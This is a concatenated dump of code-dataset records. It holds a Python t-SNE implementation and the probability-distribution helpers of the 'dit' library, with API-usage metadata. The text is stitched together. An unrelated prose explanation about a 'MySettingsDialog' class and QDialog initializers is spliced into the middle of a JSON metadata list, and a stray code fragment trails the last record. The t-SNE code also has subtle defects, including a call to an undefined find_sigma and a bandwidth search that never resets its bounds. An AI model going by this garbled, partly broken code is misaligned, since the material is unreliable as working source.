"doc_type": "code", "dataset": "code-starcoder2", "pt": "52", "api": [{"api_name": "os.getenv", "line_number": 7, "usage_type": "call"}, {"api_name": "config.configs", "line_number": 8, "usage_type": "name"}, {"api_name": "freenit.create_app", "line_number": 9, "usage_type": "call"}, {"api_name": "socket.gethostname", "line_number": 10, "usage_type": "call"}, {"api_name": "os.environ.get", 
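The MySettingsDialog record above calls both base initializers explicitly and leaves a commented-out super() attempt; passing setting_manager and mode into QDialog.__init__ as written there would normally raise a TypeError, since QDialog does not accept those keywords. The usual explicit-call pattern gives each base only the arguments it accepts. A framework-free illustration of that pattern, with plain classes standing in for the Qt and SettingDialog bases (names here are hypothetical):

class DialogBase:                  # stands in for QDialog
    def __init__(self, parent=None):
        self.parent = parent

class SettingMixin:                # stands in for SettingDialog
    def __init__(self, setting_manager, mode):
        self.setting_manager = setting_manager
        self.mode = mode

class SettingsDialog(DialogBase, SettingMixin):
    def __init__(self, setting_manager, mode):
        # Give each base only the arguments it actually accepts; passing
        # setting_manager/mode into DialogBase would raise a TypeError.
        DialogBase.__init__(self)
        SettingMixin.__init__(self, setting_manager, mode)

d = SettingsDialog(setting_manager={'debug': True}, mode='accept')
print(d.setting_manager, d.mode, d.parent)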
"line_number": 11, "usage_type": "call"}, {"api_name": "os.environ", "line_number": 11, "usage_type": "attribute"}, {"api_name": "config.OPENAPI_URL_PREFIX", "line_number": 12, "usage_type": "attribute"}, {"api_name": "config.OPENAPI_SWAGGER_UI_PATH", "line_number": 12, "usage_type": "attribute"}]} +{"seq_id": "447324661", "text": "### tSNE implementation ###\nimport numbers\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport scipy as sp\nimport scipy.spatial.distance\nMACHINE_EPSILON = np.finfo(np.double).eps\n\nimport misc, gd, plots, setup\n\ndef joint_probabilities(distances, perplexity):\n \"\"\"\\\n Computes the joint probabilities p_ij from distances D.\n\n Parameters\n ----------\n\n distances : array, shape (n_samples*(n_samples-1)/2,)\n Condensed distances.\n\n perpelxity : float, >0\n Desired perpelxity of the joint probability distribution.\n \n Returns\n -------\n\n P : array, shape (N*(N-1)/2),)\n Condensed joint probability matrix.\n \"\"\"\n distances = scipy.spatial.distance.squareform(distances)\n n_samples = len(distances)\n #Find optimal neighborhood parameters to achieve desired perplexity\n lower_bound=1e-2; upper_bound=1e2; iters=10 #parameters for binary search\n sigma = np.empty(n_samples) #bandwith array\n for i in range(n_samples):\n #initialize bandwith parameter for sample i:\n sigma_i = (lower_bound*upper_bound)**(1/2)\n for iter in range(iters):\n #distances to sample i, not including self:\n D_i = np.delete(distances[i],i) \n #compute array with conditional probabilities w.r.t. sample i:\n P_i = np.exp(-D_i**2/(2*sigma_i**2))\n P_i /= np.sum(P_i) ####\n #compute perplexity w.r.t sample i:\n HP_i = -np.dot(P_i,np.log2(P_i+MACHINE_EPSILON))\n PerpP_i = 2**(HP_i)\n #update bandwith parameter for sample i:\n if PerpP_i > perplexity:\n upper_bound = sigma_i\n else:\n lower_bound = sigma_i\n #final bandwith parameter for sample i:\n sigma[i] = (lower_bound*upper_bound)**(1/2)\n\n conditional_P = np.exp(-distances**2/(2*sigma**2))\n np.fill_diagonal(conditional_P,0)\n conditional_P /= np.sum(conditional_P,axis=1)\n \n P = conditional_P + conditional_P.T\n sum_P = np.maximum(np.sum(P), MACHINE_EPSILON)\n P = np.maximum(scipy.spatial.distance.squareform(P)/sum_P, MACHINE_EPSILON)\n return P\n\n### Cost function and gradient ###\n\ndef KL(P,embedding):\n \"\"\"\\\n KL divergence KL(P||Q) between distributions P and Q, where Q is computed\n from the student-t distribution from the given embedding array.\n\n Parameters\n ----------\n\n P : array, shape (n_samples*(n_samples-1)/2,)\n Condensed probability array.\n \n embedding : array, shape (n_samples,dim)\n Current embedding.\n\n Results\n -------\n\n kl_divergence : float\n KL-divergence KL(P||Q).\n \"\"\"\n # compute Q:\n dist = scipy.spatial.distance.pdist(embedding,metric='sqeuclidean')\n dist += 1.0\n dist **= -1.0\n Q = np.maximum(dist/(2.0*np.sum(dist)), MACHINE_EPSILON)\n \n kl_divergence = 2.0 * np.dot(\n P, np.log(np.maximum(P, MACHINE_EPSILON) / Q))\n \n return kl_divergence\n\ndef grad_KL(P,embedding,only_gradient=False):\n \"\"\"\\\n Computes KL divergence and its gradient at the given embedding.\n\n Parameters\n ----------\n\n P : array, shape (n_samples*(n_samples-1)/2,)\n Condensed probability array.\n \n embedding : array, shape (n_samples,dim)\n Current embedding.\n\n Results\n -------\n\n kl_divergence : float\n KL-divergence KL(P||Q).\n\n grad : float\n gradiet of KL(P||Q(X)) w.r.t. 
X.\n \"\"\"\n dist = scipy.spatial.distance.pdist(embedding,metric='sqeuclidean')\n dist += 1.0\n dist **= -1.0\n Q = np.maximum(dist/(2.0*np.sum(dist)), MACHINE_EPSILON) ######\n \n kl_divergence = 2.0 * np.dot(\n P, np.log(np.maximum(P, MACHINE_EPSILON) / Q))\n\n grad = np.ndarray(embedding.shape)\n PQd = scipy.spatial.distance.squareform((P-Q)*dist)\n for i in range(len(embedding)):\n grad[i] = np.dot(np.ravel(PQd[i],order='K'),embedding[i]-embedding)\n grad *= 4\n \n return grad, kl_divergence\n\ndef batch_gradient(P, embedding, batch_size=10, indices=None, weights=None,\n return_objective=True):\n \"\"\"\\\n Returns gradient approximation.\n \"\"\"\n n_samples = len(embedding)\n if indices is None:\n indices = np.arange(n_samples)\n np.random.shuffle(indices)\n else:\n assert len(indices) == n_samples\n grad = np.empty(embedding.shape)\n stress = 0\n for start in range(0, n_samples, batch_size):\n end = min(start+batch_size,n_samples)\n batch_idx = np.sort(indices[start:end])\n embedding_batch = embedding[batch_idx]\n P_batch = P[setup.batch_indices(batch_idx,n_samples)]\n grad[batch_idx], st0 = grad_KL(P_batch,\n embedding_batch)\n stress += st0\n\n return grad, stress\n\nclass TSNE(object):\n \"\"\"\\\n Class to solve tsne problems\n \"\"\"\n def __init__(self, data, dim=2, perplexity=30.0, sample_colors=None,\n verbose=0,\n indent='', title='', **kwargs):\n \"\"\"\\\n Initializes TSNE object.\n\n Parameters\n ----------\n\n data : array or dictionary\n Contains distances or dissimilarities among a set of objects.\n Can be either of the following:\n\n i) array, shape (N x N)\n Distance/dissimilarity matrix\n \n ii) array, shape (N x dim)\n Positions/featurs\n\n iii) dictionary\n See dissimilarities.py\n\n dim : int > 0\n Embedding dimension.\n\n perplexity : float > 0\n Perplexity used in determining the conditional probabilities p(i|j).\n \"\"\"\n if verbose > 0:\n print(indent+'mview.TSNE():')\n\n self.sample_colors = sample_colors\n self.verbose = verbose; self.title = title; self.indent = indent\n \n self.distances = setup.setup_distances(data)\n self.n_samples = scipy.spatial.distance.num_obs_y(self.distances)\n self.N = self.n_samples\n self.D = self.distances\n\n assert isinstance(dim,int); assert dim > 0\n self.dim = dim\n\n if verbose > 0:\n print(indent+' data details:')\n print(indent+f' number of samples : {self.n_samples}')\n print(indent+' embedding details:')\n print(indent+f' embedding dimension : {dim}')\n print(indent+f' perplexity : {perplexity:0.2f}')\n\n self.P = joint_probabilities(self.D,perplexity)\n\n self.objective = lambda X, P=self.P, **kwargs : KL(P,X)\n def gradient(embedding,batch_size=None,indices=None,**kwargs):\n if batch_size is None or batch_size >= self.n_samples:\n return grad_KL(self.P,embedding)\n else:\n return batch_gradient(self.P,embedding,batch_size,indices)\n self.gradient = gradient\n\n self.initialize()\n\n def set_sigma(self,sigma='optimal',perplexity=30.0):\n if isinstance(sigma,numbers.Number):\n assert sigma > 0\n self.sigma = np.ones(self.N)*sigma\n elif isinstance(sigma,np.ndarray):\n assert sigma.shape == (self.N,)\n assert all(sigma>0)\n self.sigma = sigma\n else:\n assert sigma is 'optimal'\n assert isinstance(perplexity,numbers.Number)\n assert perplexity > 0\n self.perplexity = perplexity\n self.sigma = find_sigma(self.D,self.perplexity)\n\n def initialize(self, X0=None, **kwargs):\n \"\"\"\\\n Set initial embedding.\n \"\"\"\n if self.verbose > 0:\n print(f' MDS.initialize({self.title}):')\n \n if X0 is None:\n X0 = 
misc.initial_embedding(self.N,dim=self.dim,\n radius=1,**kwargs)\n #radius=self.D['rms'],**kwargs)\n if self.verbose > 0:\n print(' method : random')\n else:\n assert isinstance(X0,np.ndarray)\n assert X0.shape == (self.N,self.dim)\n if self.verbose > 0:\n print(' method : initialization given')\n \n self.embedding = X0\n self.update(**kwargs)\n self.embedding0 = self.embedding.copy()\n \n if self.verbose > 0:\n print(f' initial cost : {self.cost:0.2e}')\n\n\n def update(self,**kwargs):\n self.cost = self.objective(self.embedding)\n\n def gd(self, batch_size=None, **kwargs):\n if self.verbose > 0:\n print(self.indent+' TSNE.gd():')\n print(self.indent+' specs:')\n\n if batch_size is None or batch_size >= self.n_samples:\n Xi = None\n F = lambda embedding : self.gradient(embedding)\n if self.verbose > 0:\n print(self.indent+' gradient type : full')\n else:\n def Xi():\n indices = np.arange(self.n_samples)\n np.random.shuffle(indices)\n xi = {\n 'indices' : indices\n }\n return xi\n F = lambda X, indices : self.gradient(X,batch_size,indices)\n if self.verbose > 0:\n print(self.indent+' gradient type : batch')\n print(self.indent+' batch size :',batch_size)\n\n self.embedding, H = gd.single(self.embedding,F,Xi=Xi,\n verbose=self.verbose,\n indent=self.indent+' ',\n **kwargs)\n self.update()\n if self.verbose > 0:\n print(self.indent+f' final stress : {self.cost:0.2e}')\n \n def plot_embedding(self,title='',edges=False,colors='default',labels=None,\n axis=True,plot=True,ax=None,**kwargs):\n assert self.dim >= 2\n if ax is None:\n fig, ax = plt.subplots()\n else:\n plot = False\n if edges is True:\n edges = self.D['edge_list']\n elif edges is False:\n edges = None\n if colors == 'default':\n colors = self.sample_colors\n plots.plot2D(self.embedding,edges=edges,colors=colors,labels=labels,\n axis=axis,ax=ax,title=title,**kwargs)\n if plot is True:\n plt.draw()\n plt.pause(1)\n\n\n### TESTS ###\n\ndef example_tsne(**kwargs):\n X_true = np.load('examples/123/true2.npy')#[0:500]\n colors = misc.labels(X_true)\n from scipy import spatial\n D = spatial.distance_matrix(X_true,X_true)\n\n vis = TSNE(D,verbose=2,perplexity=50,sample_colors=colors)\n vis.initialize(X0=X_true)\n vis.plot_embedding()\n vis.gd(plot=True,**kwargs)\n vis.plot_embedding()\n plt.show()\n\ndef sk_tsne():\n\n X_true = np.load('examples/123/true2.npy')#[0:500]\n from scipy import spatial\n D = spatial.distance_matrix(X_true,X_true)\n \n from sklearn.manifold import TSNE as tsne\n X_embedded = tsne(n_components=2,verbose=2,method='exact').fit_transform(X_true)\n plt.figure()\n plt.plot(X_embedded[:,0],X_embedded[:,1],'o')\n plt.show()\n \nif __name__=='__main__':\n print('mview.tsne : tests')\n example_tsne()\n \n", "sub_path": "MPSE/mview/tsne.py", "file_name": "tsne.py", "file_ext": "py", "file_size_in_byte": 11084, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "52", "api": [{"api_name": "numpy.finfo", "line_number": 7, "usage_type": "call"}, {"api_name": "numpy.double", "line_number": 7, "usage_type": "attribute"}, {"api_name": "scipy.spatial.distance.squareform", "line_number": 30, "usage_type": "call"}, {"api_name": "scipy.spatial", "line_number": 30, "usage_type": "attribute"}, {"api_name": "numpy.empty", "line_number": 34, "usage_type": "call"}, {"api_name": "numpy.delete", "line_number": 40, "usage_type": "call"}, {"api_name": "numpy.exp", "line_number": 42, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 43, "usage_type": "call"}, {"api_name": "numpy.dot", 
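grad_KL in the tsne record above is the standard t-SNE gradient, grad_i = 4 * sum_j (p_ij - q_ij) * (1 + ||x_i - x_j||^2)^(-1) * (x_i - x_j), with Q built from the Student-t kernel over the embedding. A dense numpy restatement of that formula on random toy data (normalization constants differ slightly from the condensed-form class above):

import numpy as np
from scipy.spatial.distance import pdist, squareform

rng = np.random.default_rng(0)
n, dim = 6, 2
X = rng.normal(size=(n, dim))

# Any valid condensed joint distribution works for the demo.
P = rng.random(n * (n - 1) // 2)
P /= P.sum()

# Student-t affinities Q from the embedding.
inv_dist = 1.0 / (1.0 + pdist(X, 'sqeuclidean'))
Q = inv_dist / inv_dist.sum()

# grad_i = 4 * sum_j (p_ij - q_ij) * inv_dist_ij * (x_i - x_j)
PQd = squareform((P - Q) * inv_dist)
grad = 4.0 * np.array([PQd[i] @ (X[i] - X) for i in range(n)])
print(grad.shape)  # (6, 2)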
"line_number": 45, "usage_type": "call"}, {"api_name": "numpy.log2", "line_number": 45, "usage_type": "call"}, {"api_name": "numpy.exp", "line_number": 55, "usage_type": "call"}, {"api_name": "numpy.fill_diagonal", "line_number": 56, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 57, "usage_type": "call"}, {"api_name": "numpy.maximum", "line_number": 60, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 60, "usage_type": "call"}, {"api_name": "numpy.maximum", "line_number": 61, "usage_type": "call"}, {"api_name": "scipy.spatial.distance.squareform", "line_number": 61, "usage_type": "call"}, {"api_name": "scipy.spatial", "line_number": 61, "usage_type": "attribute"}, {"api_name": "scipy.spatial.distance.pdist", "line_number": 87, "usage_type": "call"}, {"api_name": "scipy.spatial", "line_number": 87, "usage_type": "attribute"}, {"api_name": "numpy.maximum", "line_number": 90, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 90, "usage_type": "call"}, {"api_name": "numpy.dot", "line_number": 92, "usage_type": "call"}, {"api_name": "numpy.log", "line_number": 93, "usage_type": "call"}, {"api_name": "numpy.maximum", "line_number": 93, "usage_type": "call"}, {"api_name": "scipy.spatial.distance.pdist", "line_number": 119, "usage_type": "call"}, {"api_name": "scipy.spatial", "line_number": 119, "usage_type": "attribute"}, {"api_name": "numpy.maximum", "line_number": 122, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 122, "usage_type": "call"}, {"api_name": "numpy.dot", "line_number": 124, "usage_type": "call"}, {"api_name": "numpy.log", "line_number": 125, "usage_type": "call"}, {"api_name": "numpy.maximum", "line_number": 125, "usage_type": "call"}, {"api_name": "numpy.ndarray", "line_number": 127, "usage_type": "call"}, {"api_name": "scipy.spatial.distance.squareform", "line_number": 128, "usage_type": "call"}, {"api_name": "scipy.spatial", "line_number": 128, "usage_type": "attribute"}, {"api_name": "numpy.dot", "line_number": 130, "usage_type": "call"}, {"api_name": "numpy.ravel", "line_number": 130, "usage_type": "call"}, {"api_name": "numpy.arange", "line_number": 142, "usage_type": "call"}, {"api_name": "numpy.random.shuffle", "line_number": 143, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 143, "usage_type": "attribute"}, {"api_name": "numpy.empty", "line_number": 146, "usage_type": "call"}, {"api_name": "numpy.sort", "line_number": 150, "usage_type": "call"}, {"api_name": "setup.batch_indices", "line_number": 152, "usage_type": "call"}, {"api_name": "setup.setup_distances", "line_number": 197, "usage_type": "call"}, {"api_name": "scipy.spatial.distance.num_obs_y", "line_number": 198, "usage_type": "call"}, {"api_name": "scipy.spatial", "line_number": 198, "usage_type": "attribute"}, {"api_name": "numbers.Number", "line_number": 225, "usage_type": "attribute"}, {"api_name": "numpy.ones", "line_number": 227, "usage_type": "call"}, {"api_name": "numpy.ndarray", "line_number": 228, "usage_type": "attribute"}, {"api_name": "numbers.Number", "line_number": 234, "usage_type": "attribute"}, {"api_name": "misc.initial_embedding", "line_number": 247, "usage_type": "call"}, {"api_name": "numpy.ndarray", "line_number": 253, "usage_type": "attribute"}, {"api_name": "numpy.arange", "line_number": 281, "usage_type": "call"}, {"api_name": "numpy.random.shuffle", "line_number": 282, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 282, "usage_type": "attribute"}, {"api_name": "gd.single", 
"line_number": 292, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.subplots", "line_number": 304, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 304, "usage_type": "name"}, {"api_name": "plots.plot2D", "line_number": 313, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.draw", "line_number": 316, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 316, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.pause", "line_number": 317, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 317, "usage_type": "name"}, {"api_name": "numpy.load", "line_number": 323, "usage_type": "call"}, {"api_name": "misc.labels", "line_number": 324, "usage_type": "call"}, {"api_name": "scipy.spatial.distance_matrix", "line_number": 326, "usage_type": "call"}, {"api_name": "scipy.spatial", "line_number": 326, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 333, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 333, "usage_type": "name"}, {"api_name": "numpy.load", "line_number": 337, "usage_type": "call"}, {"api_name": "scipy.spatial.distance_matrix", "line_number": 339, "usage_type": "call"}, {"api_name": "scipy.spatial", "line_number": 339, "usage_type": "name"}, {"api_name": "sklearn.manifold.TSNE", "line_number": 342, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 343, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 343, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 344, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 344, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 345, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 345, "usage_type": "name"}]} +{"seq_id": "37861753", "text": "#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\n\"\"\"\nHelper non-public API functions for distributions.\n\n\"\"\"\n\n# Standard library\nfrom operator import itemgetter\nimport itertools\n\n# Other\nimport numpy as np\nfrom six.moves import map, range, zip\n\n# dit\nfrom .exceptions import ditException, InvalidDistribution, InvalidOutcome\nfrom .utils import str_product, product_maker\n\n\n\n#\n# This dictionary is a registry (which could, in principle, be updated\n# by users) that maps the outcome class (which is fixed for each distribution)\n# to an outcome constructor. The constructor takes, as input, a tuple\n# created by itertools.product and returns an object of the outcome class.\n# See get_outcome_constructor() and get_produc_func() for more details.\n#\nconstructor_map = {\n str : ''.join,\n}\n\n\n\ndef construct_alphabets(outcomes):\n \"\"\"\n Construct minimal alphabets for each random variable.\n\n In the process, it verifies that each outcome is a sequence and that all\n outcomes have the same length.\n\n Parameters\n ----------\n outcomes : sequence\n A nonempty sequence of outcomes. 
Each outcome in `outcomes` should\n be a sequence---these are the elements which determine the alphabet\n for each random variable.\n\n Returns\n -------\n alphabets : tuple\n The constructed alphabet for each random variable.\n\n Examples\n --------\n >>> construct_alphabets([(0,1), (1,1)])\n ((0,1), (1,))\n\n Raises\n ------\n ditException\n When not every outcome is a sequence.\n When not all outcomes have the same length.\n\n \"\"\"\n ## Assumption: len(outcomes) > 0\n\n # During validation, each outcome is checked to be of the proper class,\n # length, and also a sequence. However, this function is called before\n # validation and will result in hard to decipher error messages if we\n # don't at least verify that each outcome is a container of the same\n # length.\n\n # Make sure outcomes is a sequence\n try:\n len(outcomes)\n except TypeError:\n raise TypeError('`outcomes` must be a sequence.')\n\n # Make sure each outcome is sized. They really should be sequences,\n # but this check is sufficient for now.\n try:\n lengths = list(map(len, outcomes))\n except TypeError:\n raise ditException('One or more outcomes is not sized. len() fails.')\n else:\n outcome_length = lengths[0]\n\n # Make sure each outcome has the same length.\n equal_lengths = np.alltrue( np.equal( lengths, outcome_length ) )\n if not equal_lengths:\n raise ditException('Not all outcomes have the same length.')\n\n alphabets = _construct_alphabets(outcomes)\n return alphabets\n\ndef _construct_alphabets(outcomes):\n \"\"\"\n Core construction of alphabets. No sanity checks.\n\n \"\"\"\n # Its important that we maintain the order of the sample space.\n # The sample space is given by the Cartesian product of the alphabets.\n # So if the user passes sort=False to the constructor of Distribution,\n # we must make sure to keep the order of the alphabet.\n from dit.utils import OrderedDict\n\n outcome_length = len(outcomes[0])\n alphabets = [OrderedDict() for i in range(outcome_length)]\n for outcome in outcomes:\n for i,symbol in enumerate(outcome):\n alphabets[i][symbol] = True\n\n alphabets = tuple( map(tuple, alphabets) )\n return alphabets\n\ndef get_outcome_ctor(klass):\n \"\"\"\n Helper function to return an outcome constructor from the outcome class.\n\n Usually, this will be the outcome class constructor. However, for some\n classes, such as str, passing in a tuple does not return the desired\n output. For example, str( ('1','0','1') ) yields \"('0', '1', '0')\" when\n we want \"101\". The constructor should work with a tuple as input.\n\n The global `constructor_map` maps classes to their constructor. If the\n class does not exist in the dict, then we use the class constructor.\n\n \"\"\"\n return constructor_map.get(klass, klass)\n\ndef get_product_func(klass):\n \"\"\"\n Helper function to return a product function for the distribution.\n\n The idea is to return something similar to itertools.product. 
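construct_alphabets in the dit helpers record builds one alphabet per coordinate while preserving first-seen symbol order, using OrderedDict keys as an ordered set so that sample spaces generated later keep the caller's ordering. A standalone re-creation of the core step:

from collections import OrderedDict

def construct_alphabets(outcomes):
    """One alphabet per position, symbols kept in first-seen order."""
    length = len(outcomes[0])
    alphabets = [OrderedDict() for _ in range(length)]
    for outcome in outcomes:
        for i, symbol in enumerate(outcome):
            alphabets[i][symbol] = True   # keys double as an ordered set
    return tuple(tuple(a) for a in alphabets)

print(construct_alphabets([(0, 1), (1, 1)]))    # ((0, 1), (1,))
print(construct_alphabets(['10', '01', '11']))  # (('1', '0'), ('0', '1'))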
The\n difference is that the iterables should not be tuples, necessarily.\n Rather, they should match whatever the class of the outcomes is.\n\n See the docstring for Distribution.\n\n \"\"\"\n ctor = get_outcome_ctor(klass)\n if ctor == tuple:\n # No need to modify the output of itertools.\n product = itertools.product\n else:\n # Assume the sequence-like constructor can handle tuples as input.\n product = product_maker(ctor)\n\n return product\n\ndef parse_rvs(dist, rvs, rv_names=None, unique=True, sort=True):\n \"\"\"\n Returns the indexes of the random variables in `rvs`.\n\n Parameters\n ----------\n dist : joint distribution\n The joint distribution.\n rvs : list\n The list of random variables. This is either a list of random\n variable indexes or a list of random variable names.\n rv_names : bool\n If `True`, then the elements of `rvs` are treated as random variable\n names. If `False`, then the elements of `rvs` are treated as random\n variable indexes. If `None`, then the value `True` is used if the\n distribution has specified names for its random variables.\n unique : bool\n If `True`, then require that no random variable is repeated in `rvs`.\n If there are any duplicates, an exception is raised. If `False`, random\n variables can be repeated.\n sort : bool\n If `True`, then the output is sorted by the random variable indexes.\n\n Returns\n -------\n rvs : tuple\n A new tuple of the specified random variables, possibly sorted.\n indexes : tuple\n The corresponding indexes of the random variables, possibly sorted.\n\n Raises\n ------\n ditException\n If `rvs` cannot be converted properly into indexes.\n\n \"\"\"\n # Quick check for the empty set. Interpretation: no random variables.\n if len(rvs) == 0:\n return (), ()\n\n # Make sure all random variables are unique.\n if unique and len(set(rvs)) != len(rvs):\n msg = '`rvs` contained duplicates.'\n raise ditException(msg)\n\n # If `rv_names` is None, then its value depends on whether the distribution\n # has names associated with its random variables.\n if rv_names is None:\n if dist._rvs is None:\n # Interpret `rvs` as listing indexes.\n rv_names = False\n else:\n # Interpret `rvs` as listing random variable names.\n rv_names = True\n\n if rv_names:\n # Then `rvs` contained random variable names.\n # We convert these to indexes.\n indexes = []\n for rv in rvs:\n if rv in dist._rvs:\n indexes.append( dist._rvs[rv] )\n\n if len(indexes) != len(rvs):\n msg ='`rvs` contains invalid random variable names.'\n raise ditException(msg)\n else:\n # Then `rvs` contained the set of indexes.\n indexes = rvs\n\n # Make sure all indexes are valid, even if there are duplicates.\n all_indexes = set(range(dist.outcome_length()))\n good_indexes = all_indexes.intersection(indexes)\n if len(good_indexes) != len(set(indexes)):\n msg = '`rvs` contains invalid random variables'\n raise ditException(msg)\n\n # Sort the random variable names (or indexes) by their index.\n out = zip(rvs, indexes)\n if sort:\n out = list(out)\n out.sort(key=itemgetter(1))\n rvs, indexes = list(zip(*out))\n\n return rvs, indexes\n\ndef reorder(outcomes, pmf, sample_space, index=None):\n \"\"\"\n Helper function to reorder outcomes and pmf to match sample_space.\n\n \"\"\"\n if index is None:\n index = dict(zip(outcomes, range(len(outcomes))))\n\n order = [index[outcome] for outcome in sample_space if outcome in index]\n if len(order) != len(outcomes):\n # For example, `outcomes` contains an element not in `sample_space`.\n # For example, `outcomes` contains duplicates.\n 
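get_product_func above exists because rebuilding outcomes with the raw class constructor fails for strings: str(('1', '0')) gives "('1', '0')" rather than '10', so string outcomes need ''.join. A minimal stand-in for the product_maker helper it relies on (the real one lives in dit.utils; this sketch only shows the idea):

import itertools

def product_maker(ctor):
    """itertools.product, but each generated tuple is passed through ctor."""
    def product(*args, **kwargs):
        for outcome in itertools.product(*args, **kwargs):
            yield ctor(outcome)
    return product

str_product = product_maker(''.join)
print(list(str_product('01', '01')))           # ['00', '01', '10', '11']
print(list(itertools.product('01', '01'))[0])  # ('0', '0'): why the wrapper exists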
raise InvalidDistribution('outcomes and sample_space are not compatible.')\n\n outcomes = [outcomes[i] for i in order]\n pmf = [pmf[i] for i in order]\n new_index = dict(zip(outcomes, range(len(outcomes))))\n return outcomes, pmf, new_index\n\ndef reorder_cp(pmf, outcomes, alphabet, product, index=None, method=None):\n \"\"\"\n Helper function to reorder pmf and outcomes so as to match the sample space.\n\n When the sample space is not stored, explicitly on the distribution, then\n there are two ways to do this:\n 1) Determine the order by generating the entire sample space.\n 2) Analytically calculate the sort order of each outcome.\n\n If the sample space is very large and sparsely populated, then method 2)\n is probably faster. However, it must calculate a number using\n (2**(symbol_orders)).sum(). Potentially, this could be costly. If the\n sample space is small, then method 1) is probably fastest. We'll experiment\n and find a good heuristic.\n\n \"\"\"\n # A map of the elements in `outcomes` to their index in `outcomes`.\n if index is None:\n index = dict(zip(outcomes, range(len(outcomes))))\n\n # The number of elements in the sample space?\n sample_space_size = np.prod( list(map(len, alphabet)) )\n if method is None:\n if sample_space_size > 10000 and len(outcomes) < 1000:\n # Large and sparse.\n method = 'analytic'\n else:\n method = 'generate'\n\n method = 'generate'\n if method == 'generate':\n # Obtain the order from the generated order.\n sample_space = product(*alphabet)\n order = [index[outcome] for outcome in sample_space if outcome in index]\n if len(order) != len(outcomes):\n msg = 'Outcomes and sample_space are not compatible.'\n raise InvalidDistribution(msg)\n outcomes_ = [outcomes[i] for i in order]\n pmf = [pmf[i] for i in order]\n\n # We get this for free: Check that every outcome was in the sample\n # space. 
Well, its costs us a bit in memory to keep outcomes and\n # outcomes_.\n if len(outcomes_) != len(outcomes):\n # We lost an outcome.\n bad = set(outcomes) - set(outcomes_)\n L = len(bad)\n if L == 1:\n raise InvalidOutcome(bad, single=True)\n elif L:\n raise InvalidOutcome(bad, single=False)\n else:\n outcomes = outcomes_\n\n elif method == 'analytic':\n # Analytically calculate the sort order.\n # Note, this method does not verify that every outcome was in the\n # sample space.\n\n # Construct a lookup from symbol to order in the alphabet.\n alphabet_size = list(map(len, alphabet))\n alphabet_index = [dict(zip(alph, range(size)))\n for alph, size in zip(alphabet, alphabet_size)]\n\n L = len(outcomes[0]) - 1\n codes = []\n for outcome in outcomes:\n idx = 0\n for i,symbol in enumerate(outcome):\n idx += alphabet_index[i][symbol] * (alphabet_size[i])**(L-i)\n codes.append(idx)\n\n # We need to sort the codes now, keeping track of their indexes.\n order = list(zip(codes, range(len(codes))))\n order.sort()\n sorted_codes, order = list(zip(*order))\n outcomes = [outcomes[i] for i in order]\n pmf = [pmf[i] for i in order]\n else:\n raise Exception(\"Method must be 'generate' or 'analytic'\")\n\n new_index = dict(zip(outcomes, range(len(outcomes))))\n\n return pmf, outcomes, new_index\n", "sub_path": "dit/helpers.py", "file_name": "helpers.py", "file_ext": "py", "file_size_in_byte": 11704, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "51", "api": [{"api_name": "six.moves.map", "line_number": 84, "usage_type": "call"}, {"api_name": "exceptions.ditException", "line_number": 86, "usage_type": "call"}, {"api_name": "numpy.alltrue", "line_number": 91, "usage_type": "call"}, {"api_name": "numpy.equal", "line_number": 91, "usage_type": "call"}, {"api_name": "exceptions.ditException", "line_number": 93, "usage_type": "call"}, {"api_name": "dit.utils.OrderedDict", "line_number": 110, "usage_type": "call"}, {"api_name": "six.moves.range", "line_number": 110, "usage_type": "call"}, {"api_name": "six.moves.map", "line_number": 115, "usage_type": "call"}, {"api_name": "itertools.product", "line_number": 147, "usage_type": "attribute"}, {"api_name": "utils.product_maker", "line_number": 150, "usage_type": "call"}, {"api_name": "exceptions.ditException", "line_number": 197, "usage_type": "call"}, {"api_name": "exceptions.ditException", "line_number": 219, "usage_type": "call"}, {"api_name": "six.moves.range", "line_number": 225, "usage_type": "call"}, {"api_name": "exceptions.ditException", "line_number": 229, "usage_type": "call"}, {"api_name": "six.moves.zip", "line_number": 232, "usage_type": "call"}, {"api_name": "operator.itemgetter", "line_number": 235, "usage_type": "call"}, {"api_name": "six.moves.zip", "line_number": 236, "usage_type": "call"}, {"api_name": "six.moves.zip", "line_number": 246, "usage_type": "call"}, {"api_name": "six.moves.range", "line_number": 246, "usage_type": "call"}, {"api_name": "exceptions.InvalidDistribution", "line_number": 252, "usage_type": "call"}, {"api_name": "six.moves.zip", "line_number": 256, "usage_type": "call"}, {"api_name": "six.moves.range", "line_number": 256, "usage_type": "call"}, {"api_name": "six.moves.zip", "line_number": 277, "usage_type": "call"}, {"api_name": "six.moves.range", "line_number": 277, "usage_type": "call"}, {"api_name": "numpy.prod", "line_number": 280, "usage_type": "call"}, {"api_name": "six.moves.map", "line_number": 280, "usage_type": "call"}, {"api_name": 
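The 'analytic' branch of reorder_cp above sorts outcomes without generating the sample space by ranking each outcome as a mixed-radix numeral, code = sum_i rank_i * size_i^(L - i), where rank_i is the symbol's position in alphabet i; for equal-size alphabets this reproduces the itertools.product order exactly. A compact recomputation with a small invented alphabet:

import itertools

alphabet = [('a', 'b'), ('x', 'y')]  # one alphabet per position
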